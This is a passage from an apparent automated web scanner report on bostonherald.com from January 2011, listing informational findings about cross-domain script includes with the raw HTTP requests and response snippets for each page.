<script type="text/javascript" src="http://www.aolcdn.com/_media/ke_tools/mmx_refresh_patch.js"> </script>
...[SNIP]...

18.572. http://www.bostonherald.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/carousel.js
http://cache.heraldinteractive.com/js/common.js?nocache=123
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028
http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092
http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121

Request

GET / HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 157372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.573. http://www.bostonherald.com/&WIDTH=1036&HEIGHT=1012&WIDTH_RANGE=WR_D&DATE=01110128&HOUR=15&RES=RS21&ORD=7769683764781803&req=fr&&&~=& previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/&WIDTH=1036&HEIGHT=1012&WIDTH_RANGE=WR_D&DATE=01110128&HOUR=15&RES=RS21&ORD=7769683764781803&req=fr&&&~=&

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /&WIDTH=1036&HEIGHT=1012&WIDTH_RANGE=WR_D&DATE=01110128&HOUR=15&RES=RS21&ORD=7769683764781803&req=fr&&&~=& HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:15:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.574. http://www.bostonherald.com/about/contact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/about/contact/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /about/contact/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:10:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.575. http://www.bostonherald.com/about/contact/news_tip.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/about/contact/news_tip.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /about/contact/news_tip.bg HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:11:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 31651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.576. http://www.bostonherald.com/about/electronic_edition/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/about/electronic_edition/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /about/electronic_edition/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:10:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 26986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.577. http://www.bostonherald.com/about/home_delivery/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/about/home_delivery/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /about/home_delivery/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:08:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.578. http://www.bostonherald.com/blogs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /blogs/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:47:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.579. http://www.bostonherald.com/blogs/entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /blogs/entertainment/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:55:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.580. http://www.bostonherald.com/blogs/entertainment/disney_days/index.php/2011/01/26/castaway-cay-a-great-beach-stopover/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/blogs/entertainment/disney_days/index.php/2011/01/26/castaway-cay-a-great-beach-stopover/

